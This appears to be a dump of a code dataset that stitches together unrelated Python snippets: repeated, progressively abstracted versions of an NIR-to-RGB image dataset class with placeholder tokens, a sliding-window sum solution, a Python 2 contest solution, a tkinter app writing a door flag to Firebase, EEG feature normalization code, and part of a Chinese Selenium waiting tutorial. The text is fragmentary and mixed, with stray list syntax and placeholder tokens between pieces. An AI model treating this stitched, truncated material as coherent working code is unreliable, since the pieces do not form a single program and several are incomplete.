super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n <function token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n <function token>\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n <function token>\n <function token>\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n"
] | false |
99,894 | c731d4d8b71dcadc7627d645639d2515dcf904a0 | T = int(input())
for tc in range(T):
n, m = map(int, input().split())
num = list(map(int, input().split()))
num_sum = 0
ans = []
for i in range(n-m+1):
sum = 0
for j in range(m):
sum += num[j+i]
ans.append(sum)
print(f"#{tc+1} {max(ans) - min(ans)}") | [
"T = int(input())\n\nfor tc in range(T):\n n, m = map(int, input().split())\n\n num = list(map(int, input().split()))\n \n num_sum = 0\n ans = []\n for i in range(n-m+1):\n sum = 0\n for j in range(m):\n sum += num[j+i]\n ans.append(sum)\n print(f\"#{tc+1} {max(ans) - min(ans)}\")",
"T = int(input())\nfor tc in range(T):\n n, m = map(int, input().split())\n num = list(map(int, input().split()))\n num_sum = 0\n ans = []\n for i in range(n - m + 1):\n sum = 0\n for j in range(m):\n sum += num[j + i]\n ans.append(sum)\n print(f'#{tc + 1} {max(ans) - min(ans)}')\n",
"<assignment token>\nfor tc in range(T):\n n, m = map(int, input().split())\n num = list(map(int, input().split()))\n num_sum = 0\n ans = []\n for i in range(n - m + 1):\n sum = 0\n for j in range(m):\n sum += num[j + i]\n ans.append(sum)\n print(f'#{tc + 1} {max(ans) - min(ans)}')\n",
"<assignment token>\n<code token>\n"
] | false |
99,895 | 74d31520b5f8feae1fe7df54100509c97f5ddfe3 | ##input = open('C-sample-input.txt', 'r')
##output = open('C-sample-output.txt', 'w')
#input = open('/Users/pruthvikarreddy/Downloads/test.in', 'r')
import math
input = open('A-small-attempt0 (2).in', 'r')
output = open('A-small.out', 'w')
##input = open('C-large.in', 'r')
##output = open('C-large.out', 'w')
def read_int():
return int(input.readline().strip())
def read_ints():
return [int(x) for x in input.readline().split()]
def read_frac():
return [int(x) for x in input.readline().split('/')]
def read_float():
return float(input.readline().strip())
def read_floats():
return [float(x) for x in input.readline().split()]
def read_floats():
return [float(x) for x in input.readline().split()]
def read_strs():
return [x for x in input.readline().split()]
def read_str():
return input.readline().strip()
def read_floats():
return input.readline().split()
def solve(N, perm):
return 'ans'
def main():
num_cases = read_int()
for case in range(1, num_cases+1):
t,b=read_frac()
lt,lb=math.log(t,2),math.log(b,2)
logs=lb-lt
if logs==int(logs) or lb==int(lb):
solution=int(math.ceil(logs))
else:
solution='impossible'
solution_string = "Case #%d: %s" %(case, solution)
output.write(solution_string + "\n")
print solution_string
if __name__=='__main__':
main()
input.close()
output.close()
| [
"##input = open('C-sample-input.txt', 'r')\n##output = open('C-sample-output.txt', 'w')\n#input = open('/Users/pruthvikarreddy/Downloads/test.in', 'r')\nimport math\ninput = open('A-small-attempt0 (2).in', 'r')\noutput = open('A-small.out', 'w')\n\n##input = open('C-large.in', 'r')\n##output = open('C-large.out', 'w')\n\ndef read_int():\n return int(input.readline().strip())\n\ndef read_ints():\n return [int(x) for x in input.readline().split()]\n \ndef read_frac():\n return [int(x) for x in input.readline().split('/')]\n\ndef read_float():\n return float(input.readline().strip())\n\ndef read_floats():\n return [float(x) for x in input.readline().split()]\n \ndef read_floats():\n return [float(x) for x in input.readline().split()]\n \ndef read_strs():\n return [x for x in input.readline().split()]\n\ndef read_str():\n return input.readline().strip()\n \ndef read_floats():\n return input.readline().split()\n\ndef solve(N, perm):\n return 'ans'\n\ndef main():\n num_cases = read_int()\n for case in range(1, num_cases+1):\n t,b=read_frac()\n lt,lb=math.log(t,2),math.log(b,2)\n logs=lb-lt\n if logs==int(logs) or lb==int(lb):\n solution=int(math.ceil(logs))\n else:\n solution='impossible'\n solution_string = \"Case #%d: %s\" %(case, solution)\n output.write(solution_string + \"\\n\")\n print solution_string\n \nif __name__=='__main__':\n main()\n input.close()\n output.close()\n \n"
] | true |
99,896 | eac02e22edb433e7df9d234144c815eb8cd8cb25 | # coding: utf-8
class boolOperator:
def __init__(self, expression):
self.expression = expression
def compute(self):
pass | [
"# coding: utf-8\nclass boolOperator:\n def __init__(self, expression):\n self.expression = expression\n\n def compute(self):\n pass",
"class boolOperator:\n\n def __init__(self, expression):\n self.expression = expression\n\n def compute(self):\n pass\n",
"class boolOperator:\n\n def __init__(self, expression):\n self.expression = expression\n <function token>\n",
"class boolOperator:\n <function token>\n <function token>\n",
"<class token>\n"
] | false |
99,897 | c5f6e54e343a818a057ba247a2005af314f37071 | import tkinter
from firebase import firebase
firebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com', None)
# 按下open時可將 firebase 上 myhouse 的門打開
def openthedoor():
result = firebase.patch('/myhouse', {'open': 1})
# 按下close時可將 firebase 上 myhouse 的門關閉
def closethedoor():
result = firebase.patch('/myhouse', {'open': 0})
win = tkinter.Tk()
win.title('Door Open')
win.geometry('300x100')
OpenButton = tkinter.Button(win, text='Open', command=openthedoor) # UPdate 為上傳最新時間
OpenButton.config(font=('Arial', 20))
OpenButton.pack(side=tkinter.LEFT)
CloseButton = tkinter.Button(win, text='Close', command=closethedoor) # UPdate 為上傳最新時間
CloseButton.config(font=('Arial', 20))
CloseButton.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"import tkinter\r\nfrom firebase import firebase\r\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com', None)\r\n\r\n# 按下open時可將 firebase 上 myhouse 的門打開\r\ndef openthedoor():\r\n result = firebase.patch('/myhouse', {'open': 1})\r\n\r\n# 按下close時可將 firebase 上 myhouse 的門關閉\r\ndef closethedoor():\r\n result = firebase.patch('/myhouse', {'open': 0})\r\n\r\nwin = tkinter.Tk()\r\nwin.title('Door Open')\r\nwin.geometry('300x100')\r\n\r\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor) # UPdate 為上傳最新時間\r\nOpenButton.config(font=('Arial', 20))\r\nOpenButton.pack(side=tkinter.LEFT)\r\n\r\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor) # UPdate 為上傳最新時間\r\nCloseButton.config(font=('Arial', 20))\r\nCloseButton.pack(side=tkinter.RIGHT)\r\n\r\nwin.mainloop()\r\n\r\n",
"import tkinter\nfrom firebase import firebase\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com',\n None)\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\nwin = tkinter.Tk()\nwin.title('Door Open')\nwin.geometry('300x100')\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor)\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor)\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com',\n None)\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\nwin = tkinter.Tk()\nwin.title('Door Open')\nwin.geometry('300x100')\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor)\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor)\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\n<assignment token>\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\nwin.title('Door Open')\nwin.geometry('300x100')\n<assignment token>\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\n<assignment token>\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\n<assignment token>\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,898 | bbab221eb62676a9b62ced0fe045932228c05b95 | import numpy as np
from tqdm import tqdm
import os
def normalization():
print('Normalization...')
modes = ['train', 'test']
for mode in modes:
features = []
if mode == 'train':
eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')
eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')
emg = np.load('./data/train_emg_fft_features_new.npy')
else:
eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')
eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')
emg = np.load('./data/test_emg_fft_features_new.npy')
eeg1 = np.log(eeg1)
eeg2 = np.log(eeg2)
emg = np.log(emg)
for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):
eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)) / np.std(eeg1_sig, axis=0, keepdims=True)
eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)) / np.std(eeg2_sig, axis=0, keepdims=True)
emg_sig = np.sum(emg_sig, axis=0, keepdims=True)
emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)
eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig), axis=2))
features = np.array(features)
np.save('./data/{}_x.npy'.format(mode), np.array(features))
def generate_feature_with_adjacent_epochs():
print('concat adjacent epochs feature')
modes = ['train', 'test']
for mode in modes:
base_dir = './data/features_{}'.format(mode)
if not os.path.exists(base_dir):
os.mkdir(base_dir)
features = np.load('./data/{}_x.npy'.format(mode))
idx = 0
if mode == 'train':
sub_num = 3
else:
sub_num = 2
for i in range(sub_num):
sub_feature = features[i * 21600:(i + 1) * 21600]
sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(sub_feature[:, :, :, 2])) / np.std(
sub_feature[:, :, :, 2])
for j in tqdm(range(len(sub_feature))):
lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1], sub_feature[j],
sub_feature[(j + 1) % len(sub_feature)], sub_feature[(j + 2) % len(sub_feature)]),
axis=1)
np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.array(lf))
idx+=1
def main():
print()
print('***************By Killer Queen***************')
normalization()
generate_feature_with_adjacent_epochs()
main()
| [
"import numpy as np\nfrom tqdm import tqdm\nimport os\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig), axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(sub_feature[:, :, :, 2])) / np.std(\n sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1], sub_feature[j],\n sub_feature[(j + 1) % len(sub_feature)], sub_feature[(j + 2) % len(sub_feature)]),\n axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.array(lf))\n idx+=1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"import numpy as np\nfrom tqdm import tqdm\nimport os\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\n<code token>\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,899 | 07b5ecd51e80969ff6cbced98e0397e21733cff1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# 页面等待
# 注意:这是非常重要的一部分!!
#
# 现在的网页越来越多采用了 Ajax 技术,这样程序便不能确定何时某个元素完全加载出来了。如果实际页面等待时间过长导致某个dom元素还没出来,但是你的代码直接使用了这个WebElement,那么就会抛出NullPointer的异常。
#
# 为了避免这种元素定位困难而且会提高产生 ElementNotVisibleException 的概率。所以 Selenium 提供了两种等待方式,一种是隐式等待,一种是显式等待。
#
# 隐式等待是等待特定的时间,显式等待是指定某一条件直到这个条件成立时继续执行。
# 显式等待
# 1.显式等待指定某个条件,然后设置最长等待时间。如果在这个时间还没有找到元素,那么便会抛出异常了。
from selenium import webdriver
from selenium.webdriver.common.by import By
